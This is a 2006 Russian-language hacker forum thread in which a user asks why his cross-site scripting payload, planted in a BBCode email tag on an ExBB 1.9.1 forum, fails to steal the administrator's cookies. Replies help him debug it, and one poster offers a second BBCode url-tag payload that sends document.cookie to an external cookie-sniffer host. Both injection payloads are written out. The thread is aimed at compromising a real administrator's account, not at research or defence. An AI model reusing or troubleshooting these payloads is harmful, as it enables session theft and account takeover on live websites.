Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Вопрос по применению XSS на форуме ExBB 1.9.1 (https://forum.antichat.xyz/showthread.php?t=15044)

TweakeR 26.02.2006 03:31
Вопрос по применению XSS на форуме ExBB 1.9.1
 
Пробывал:

Код:
[ email]'style='display:none;background:url(javascript:doc  ument.images[2].src="http://you_sniffer_url/sniffer.php?"+document.cookie)[/email
Админ прочитал а не чё не шлёт!
Что можно придумать подскажите? :D

tclover 26.02.2006 03:39
а чё так и оставил?

Vovec 26.02.2006 04:55
А что тебе админ должен прислать=)
Куки должны были тебе слиться, на сниффер который ты указал, если ты это сделал... Только убери пробел между doc и ument и в конце поставь ] ну и конешно путь к сниферу например античатовскому "http://antichat.ru/cgi-bin/s.jpg" Если будет работать то тебе должны будут первыми прийти твои куки если ты там зареген...

A110ut 26.02.2006 05:05
лол :) бывает и такое)
короче вот еще один. используется также как и твой

Код:
[*url]http:/*/sasa'style=background:url("javascript:document.images[0].src='http://antichat.org/s/ТВАЙ_СНИФАК.gif?'+document.cookie");lol:'sa[*/url]
зы: * * * убери

TweakeR 26.02.2006 12:11
Trampled_clover нет конечно снифер подставил и все пробелы убрал!

Inferno 26.02.2006 12:26
Цитата:
Сообщение от TweakeR
Trampled_clover нет конечно снифер подставил и все пробелы убрал!
А скобку не закрыл?

Tem 26.02.2006 12:29
А может у него не ОСЛИК ? поэтому не шлёт .Если я не ошибаюсь этот XSS только для ИЕ браузера.

podkashey 27.02.2006 03:08
ггыгыгы.... У меня 2 варианта ответа:
1)
Цитата:
А может у него не ОСЛИК
согласен с этим (Ослик - интернет эксплорер).
2) Админ умный и форум пропатчен.

Electro 27.02.2006 03:22
Цитата:
Сообщение от TweakeR
Админ прочитал а не чё не шлёт!
Что можно придумать подскажите? :D
Покажи как выглядит результат скрипта в HTML

milord69 28.02.2006 18:24
В 7 ИЕ куки не тырятся


Время: 23:20